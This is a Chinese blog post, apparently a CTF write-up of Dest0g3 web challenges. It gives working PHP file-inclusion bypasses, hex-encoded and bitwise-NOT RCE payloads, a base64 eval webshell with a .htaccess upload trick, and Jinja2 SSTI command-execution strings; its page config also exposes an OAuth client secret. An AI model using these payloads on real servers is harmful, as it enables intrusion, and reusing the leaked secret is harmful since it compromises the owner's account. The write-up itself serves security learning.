<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Latte">
    
    <title>
        
            2022Dest0g3-520迎新赛-web(1-5题) |
        
        Latte&#39;s
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/logo.png">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/brands.min.css">
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"ohvy.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"Latte's","author":"Latte","avatar":"/images/cat.svg","logo":"/images/logo.png","favicon":"/images/logo.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","tools":"/tools","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Latte and Americano.","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://github.com/ohvy","weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":"shiwwang@163.com"}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":false,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":true,"reward":{"enable":false,"img_link":null,"text":null},"img_align":"center"},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":true,"preload":false},"comment":{"enable":false,"use":"gitalk","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":"ohvy","github_admins":null,"repository":"gitalk-comments","client_id":"Ov23liQm7PTQpK5JLa0h","client_secret":"ba0525d7d59a301a09ac76ed9299df6ceb9a42a5","proxy":"https://worker-ohvy.shiwwang.workers.dev/?https://github.com/login/oauth/access_token"},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2022,"word_count":false,"icp":{"enable":false,"record_code":null,"url":"https://beian.miit.gov.cn"},"site_deploy":{"enable":false,"provider":"github","url":null},"shields_style":{"enable":false,"custom":[{"link_url":null,"img_url":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{"tools":[{"category":"聊天 AI"},{"name":"ChatGPT","link":"https://chat.openai.com/","description":"OpenAI 旗下 AI 聊天对话工具","image":"/images/tools/chatgpt.svg"},{"name":"Gemini","link":"https://gemini.google.com/app","description":"Google 旗下 AI 聊天对话工具","image":"/images/tools/gemini.svg"},{"category":"待开发"}]},"version":"4.1.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.png">
                </a>
            
            <a class="site-name border-box" href="/">
               Latte&#39;s
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                
                                标签
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                
                                分类
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/tools"
                            >
                                
                                工具
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags"
                    >标签</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories"
                    >分类</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tools"
                    >工具</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        2022Dest0g3-520迎新赛-web(1-5题)
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/cat.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Latte</span>
                                
                                    <span class="author-badge">Lv2</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2022-12-06 00:32:54</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Mon May 06 2024 20:45:19 GMT+0800">2024-05-06 20:45:19</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/Write-Up/">Write Up</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/CTF/">CTF</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/web/">web</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <h1 id="phpdest"><a href="#phpdest" class="headerlink" title="phpdest"></a>phpdest</h1><p>放出源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">require_once &#x27;flag.php&#x27;;</span><br><span class="line">if(isset($_GET[&#x27;file&#x27;])) &#123;</span><br><span class="line">    require_once($_GET[&#x27;file&#x27;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这一次是对<code>require_once()</code>函数的考查，其调用时php会检查该文件是否已经被包含过，如果是则不会再次包含，于是我们必须想办法绕过这个机制，从而实现再次包含文件flag.php.</p>
<p>上一次我们学习到php伪协议，结合下面这个知识点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/proc/self指向当前进程的/proc/pid/，/proc/self/root/是指向/的符号链接</span><br></pre></td></tr></table></figure>

<p>我们就可以用伪协议配合多级符号链接的办法进行绕过，直接构造payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php</span><br></pre></td></tr></table></figure>

<p>GET传参成功<br><img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220824214540576-494053270.png"
                         width=500
                 ><br>转码后成功得到flag.<br><code>flag = &quot;Dest0g3&#123;ef8f9913-9d91-4c88-9773-0810a40f8ad8&#125;</code><br>[资料查阅：<a class="link"   target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/213235" >require_once 绕过不能重复包含文件的限制<i class="fas fa-external-link-alt"></i></a>]</p>
<hr>
<h1 id="EasyPHP"><a href="#EasyPHP" class="headerlink" title="EasyPHP"></a>EasyPHP</h1><p>依旧给出源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">include &quot;fl4g.php&quot;;</span><br><span class="line">$dest0g3 = $_POST[&#x27;ctf&#x27;];</span><br><span class="line">$time = date(&quot;H&quot;);</span><br><span class="line">$timme = date(&quot;d&quot;);</span><br><span class="line">$timmme = date(&quot;i&quot;);</span><br><span class="line">if(($time &gt; &quot;24&quot;) or ($timme &gt; &quot;31&quot;) or ($timmme &gt; &quot;60&quot;))&#123;</span><br><span class="line">    echo $fl4g;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo &quot;Try harder!&quot;;</span><br><span class="line">&#125;</span><br><span class="line">set_error_handler(</span><br><span class="line">    function() use(&amp;$fl4g) &#123;</span><br><span class="line">        print $fl4g;</span><br><span class="line">    &#125;</span><br><span class="line">);</span><br><span class="line">$fl4g .= $dest0g3;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>易知需要我们POST方式传入<code>ctf</code>，然后拼接在<code>$fl4g</code>后面，而输出<code>$fl4g</code>只能想办法触发<code>set_error_handler()</code>。</p>
<p>这里我们利用<code>把数组当作字符串进行拼接运算时会报错</code>这一点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Notice:Array to string conversion</span><br><span class="line">//把数组当成了字符串使用，进行 .= 运算时，会自动根据环境需要转换数据类型（echo、print输出数组时也会报这样的信息）</span><br></pre></td></tr></table></figure>

<p>把<code>ctf</code>用POST传入，即payload<code>ctf[]=1</code></p>
<img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220825174531270-459754094.png"
                         width=500
                 >

<p>成功获得flag.</p>
<hr>
<h1 id="SimpleRCE"><a href="#SimpleRCE" class="headerlink" title="SimpleRCE"></a>SimpleRCE</h1><p>源码给出：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$aaa=$_POST[&#x27;aaa&#x27;];</span><br><span class="line">$black_list=array(&#x27;^&#x27;,&#x27;.&#x27;,&#x27;`&#x27;,&#x27;&gt;&#x27;,&#x27;&lt;&#x27;,&#x27;=&#x27;,&#x27;&quot;&#x27;,&#x27;preg&#x27;,&#x27;&amp;&#x27;,&#x27;|&#x27;,&#x27;%0&#x27;,&#x27;popen&#x27;,&#x27;char&#x27;,&#x27;decode&#x27;,&#x27;html&#x27;,&#x27;md5&#x27;,&#x27;&#123;&#x27;,&#x27;&#125;&#x27;,&#x27;post&#x27;,&#x27;get&#x27;,&#x27;file&#x27;,&#x27;ascii&#x27;,&#x27;eval&#x27;,&#x27;replace&#x27;,&#x27;assert&#x27;,&#x27;exec&#x27;,&#x27;$&#x27;,&#x27;include&#x27;,&#x27;var&#x27;,&#x27;pastre&#x27;,&#x27;print&#x27;,&#x27;tail&#x27;,&#x27;sed&#x27;,&#x27;pcre&#x27;,&#x27;flag&#x27;,&#x27;scan&#x27;,&#x27;decode&#x27;,&#x27;system&#x27;,&#x27;func&#x27;,&#x27;diff&#x27;,&#x27;ini_&#x27;,&#x27;passthru&#x27;,&#x27;pcntl&#x27;,&#x27;proc_open&#x27;,&#x27;+&#x27;,&#x27;cat&#x27;,&#x27;tac&#x27;,&#x27;more&#x27;,&#x27;sort&#x27;,&#x27;log&#x27;,&#x27;current&#x27;,&#x27;\\&#x27;,&#x27;cut&#x27;,&#x27;bash&#x27;,&#x27;nl&#x27;,&#x27;wget&#x27;,&#x27;vi&#x27;,&#x27;grep&#x27;);</span><br><span class="line">$aaa = str_ireplace($black_list,&quot;hacker&quot;,$aaa);</span><br><span class="line">eval($aaa);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>需要我们绕过<code>str_ireplace()函数(不区分大小写地对数组中所有元素进行搜索替换)</code>上传命令，从而实现RCE.</p>
<p>Ⅰ、十六进制编码绕过<br>由于过滤了<code>decode</code>，base64编码不能使用，我们想到十六进制转换后绕过。脚本如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a= &quot;system&quot;;</span><br><span class="line">$b=&quot;cat *&quot;;//命令</span><br><span class="line"></span><br><span class="line">$p=&#x27;sysytem:&#x27;.bin2hex($a).&#x27;&lt;br&gt;command:&#x27;.bin2hex($b);</span><br><span class="line">echo $p;</span><br><span class="line">?&gt; </span><br><span class="line"></span><br><span class="line">//sysytem:73797374656d</span><br><span class="line">//command:636174202a</span><br></pre></td></tr></table></figure>

<p>构造payload:<code>aaa=hex2bin(&#39;73797374656D&#39;)(hex2bin(&#39;636174202f2a&#39;));//不加;不行</code><br>成功拿到flag.<br><img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220825191746040-258199898.png"
                         width=500
                 ></p>
<p>Ⅱ、无参RCE直接过<br>看到的一种很牛的办法，不过还没有弄清原理。<br>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">POST：</span><br><span class="line">aaa=show_source(next(apache_request_headers()));</span><br><span class="line">User-Agent: /flag</span><br></pre></td></tr></table></figure>

<p>Ⅲ、当然，还有其他绕过方法，如取反绕过：取反基本上用的都是一个不可见字符，不会触发到正则表达式。这里不再赘述，给出脚本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//在命令行中运行</span><br><span class="line"></span><br><span class="line">/*author yu22x*/</span><br><span class="line"></span><br><span class="line">fwrite(STDOUT,&#x27;[+]your function: &#x27;);</span><br><span class="line"></span><br><span class="line">$system=str_replace(array(&quot;\r\n&quot;, &quot;\r&quot;, &quot;\n&quot;), &quot;&quot;, fgets(STDIN)); </span><br><span class="line"></span><br><span class="line">fwrite(STDOUT,&#x27;[+]your command: &#x27;);</span><br><span class="line"></span><br><span class="line">$command=str_replace(array(&quot;\r\n&quot;, &quot;\r&quot;, &quot;\n&quot;), &quot;&quot;, fgets(STDIN)); </span><br><span class="line"></span><br><span class="line">echo &#x27;[*] (~&#x27;.urlencode(~$system).&#x27;)(~&#x27;.urlencode(~$command).&#x27;);&#x27;;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>[资料查阅：<a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/109143413" >无字母数字绕过正则表达式总结<i class="fas fa-external-link-alt"></i></a>]</p>
<hr>
<h1 id="funny-upload"><a href="#funny-upload" class="headerlink" title="funny_upload"></a>funny_upload</h1><p>查看页面源代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt;</span><br><span class="line">    &lt;title&gt;&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;script language=&quot;javascript&quot;&gt;</span><br><span class="line">function Checkfiles()</span><br><span class="line">&#123;</span><br><span class="line">var fup = document.getElementById(&#x27;file&#x27;);</span><br><span class="line">var fileName = fup.value;</span><br><span class="line">var ext = fileName.substring(fileName.lastIndexOf(&#x27;.&#x27;) + 1);</span><br><span class="line">if(ext == &quot;gif&quot; || ext == &quot;GIF&quot; || ext == &quot;JPEG&quot; || ext == &quot;jpeg&quot; || ext == &quot;jpg&quot; || ext == &quot;JPG&quot; || ext == &quot;png&quot; || ext == &quot;PNG&quot;)</span><br><span class="line">&#123;</span><br><span class="line">return true;</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">alert(&quot;这个文件不好，我不喜欢&quot;);</span><br><span class="line">return false;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;form method=&quot;post&quot; onsubmit=&quot;return Checkfiles()&quot; enctype=&quot;multipart/form-data&quot; &gt;</span><br><span class="line">    &lt;input type=&quot;file&quot; name=&quot;file&quot; id=&quot;file&quot;&gt;</span><br><span class="line">    &lt;input  type=&quot;submit&quot; name=&quot;1&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(&#x27;文件内容也改改呗~&#x27;);&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>可知前端对文件进行了绕过，且对文件内容也进行了过滤，尝试base64编码绕过：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[1]); ?&gt;</span><br><span class="line">base64编码——&gt;</span><br><span class="line">PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4=</span><br></pre></td></tr></table></figure>

<img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220825205743738-733807108.png"
                         width=500
                 >

<p>上传成功！接下来的问题是，如何把这个上传的<code>.png</code>文件解析为<code>.php</code>文件。</p>
<p>了解到<code>.htaccess文件(或者&quot;分布式配置文件&quot;）</code></p>
<blockquote>
<p>htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许&#x2F;阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。</p>
</blockquote>
<p>其中<code>Addtype指令</code>可以将给定的文件拓展名映射到指定的内容类型：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">AddType media-type extension [extension] ...</span><br><span class="line"> </span><br><span class="line">示例：</span><br><span class="line">AddType application/x-httpd-php .gif</span><br><span class="line"> </span><br><span class="line">将以 gif 为后缀的文件当做 php 解析</span><br><span class="line"></span><br><span class="line">AddType application/x-httpd-php png  jpg gif</span><br><span class="line">将以上的多个后缀都当作php解析。</span><br></pre></td></tr></table></figure>

<p>并且，通过 <code>php_value</code> 来设置 <code>auto_prepend_file</code> 或者 <code>auto_append_file</code> 配置选项<strong>包含</strong>一些敏感文件，同时在本目录或子目录里<strong>需要有可解析的php文件来触发</strong>。</p>
<p>结合以上两个指令，我们可以上传一个<code>.htaccess</code>文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Addtype application/x-httpd-php .jpg</span><br><span class="line">#将以 jpg 为后缀的文件当做 php 解析</span><br><span class="line"></span><br><span class="line">php_value auto_append_file &quot;php://filter/convert.base64-decode/resource=webshell.jpg&quot;</span><br><span class="line">#配合php伪协议+包含“函数”实现文件执行 </span><br></pre></td></tr></table></figure>

<img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220825220347514-316795705.png"
                         width=500
                 >

<p>修改请求包上传成功。</p>
<p>按照路径打开webshell.jpg-&gt;当作php解析-&gt;触发<code>php_value auto_append_file</code>指令-&gt;执行源码</p>
<img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220825221309028-1614586059.png"
                         width=500
                 >

<p>连接蚁剑，在根目录下找到Flag.</p>
<img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220825221608176-1984943651.png"
                         width=500
                 >

<p>[查阅资料：<a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/snowlyzz/article/details/126267637" >.htaccess的利用方法和技巧<i class="fas fa-external-link-alt"></i></a>]</p>
<hr>
<h1 id="EasySSTI"><a href="#EasySSTI" class="headerlink" title="EasySSTI"></a>EasySSTI</h1><img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202208/2933309-20220825222602197-1595222581.png"
                         width=500
                 >

<p>上来就让我们登录（截这张图完全因为background好看哈哈哈❤）</p>
<p>根据题目名称提示，这题考察我们SSTI。补习了一些SSTI的知识后【<a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/ialoe/p/ssti.html" >服务器端模板注入（SSTI）<i class="fas fa-external-link-alt"></i></a>】，先用bp抓包，找注入点：<br><img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202209/2933309-20220916012811391-903505005.png"
                         width=200
                 ><br>发现在<code>username</code>处有jinja2模板引擎的SSTI漏洞。<br>于是用<code>&#39;&#39;.__class__</code>等进行简单测试，发现<code>_</code>，<code>&#39;</code>，<code>&quot;</code>，<code> </code>，<code>[</code>都被过滤了，于是用<code>&#123;&#123;().request.args.class&#125;&#125;&amp;class=__class__</code>尝试绕过，结果<code>request</code>也被过滤。（事实上<code>globals</code>，<code>getitem</code>，<code>os</code>，<code>read</code>，<code>popen</code>，<code>pop</code>也都被过滤，但是我还没有测出来）<br>从其他师傅那里piao到小姿势：<code>&#123;&#123;config&#125;&#125;可以用来查看配置信息，通过这个或许能够构造出我要的payload</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;lt;Config &#123;&amp;#39;ENV&amp;#39;: &amp;#39;production&amp;#39;, &amp;#39;DEBUG&amp;#39;: False, &amp;#39;TESTING&amp;#39;: False, &amp;#39;PROPAGATE_EXCEPTIONS&amp;#39;: None, &amp;#39;PRESERVE_CONTEXT_ON_EXCEPTION&amp;#39;: None, &amp;#39;SECRET_KEY&amp;#39;: None, &amp;#39;PERMANENT_SESSION_LIFETIME&amp;#39;: datetime.timedelta(days=31), &amp;#39;USE_X_SENDFILE&amp;#39;: False, &amp;#39;SERVER_NAME&amp;#39;: None, &amp;#39;APPLICATION_ROOT&amp;#39;: &amp;#39;/&amp;#39;, &amp;#39;SESSION_COOKIE_NAME&amp;#39;: &amp;#39;session&amp;#39;, &amp;#39;SESSION_COOKIE_DOMAIN&amp;#39;: None, &amp;#39;SESSION_COOKIE_PATH&amp;#39;: None, &amp;#39;SESSION_COOKIE_HTTPONLY&amp;#39;: True, &amp;#39;SESSION_COOKIE_SECURE&amp;#39;: False, &amp;#39;SESSION_COOKIE_SAMESITE&amp;#39;: None, &amp;#39;SESSION_REFRESH_EACH_REQUEST&amp;#39;: True, &amp;#39;MAX_CONTENT_LENGTH&amp;#39;: None, &amp;#39;SEND_FILE_MAX_AGE_DEFAULT&amp;#39;: None, &amp;#39;TRAP_BAD_REQUEST_ERRORS&amp;#39;: None, &amp;#39;TRAP_HTTP_EXCEPTIONS&amp;#39;: False, &amp;#39;EXPLAIN_TEMPLATE_LOADING&amp;#39;: False, &amp;#39;PREFERRED_URL_SCHEME&amp;#39;: &amp;#39;http&amp;#39;, &amp;#39;JSON_AS_ASCII&amp;#39;: True, &amp;#39;JSON_SORT_KEYS&amp;#39;: True, &amp;#39;JSONIFY_PRETTYPRINT_REGULAR&amp;#39;: False, &amp;#39;JSONIFY_MIMETYPE&amp;#39;: &amp;#39;application/json&amp;#39;, &amp;#39;TEMPLATES_AUTO_RELOAD&amp;#39;: None, &amp;#39;MAX_COOKIE_SIZE&amp;#39;: 4093&#125;&amp;gt;</span><br></pre></td></tr></table></figure>

<p>找到<code>\</code>，可以利用<code>config|string|list</code>获取以执行命令查看根目录……<br>接续翻查资料了解到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1. python下的数据拼接</span><br><span class="line">join 方法 拼接字典，主要用于索引上的合并:默认按索引合并，可以合并相同或相似的索引，不管他们有没有重叠列</span><br><span class="line"></span><br><span class="line">2. &#123;&#123;()|select|string|list&#125;&#125;  or  &#123;&#123;lipsum|select|string|list&#125;&#125;     </span><br><span class="line">获取字符列表  </span><br><span class="line"></span><br><span class="line">3. &#123;&#123;lipsum.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line">命令执行</span><br></pre></td></tr></table></figure>

<img    
                       lazyload
                       alt="image"
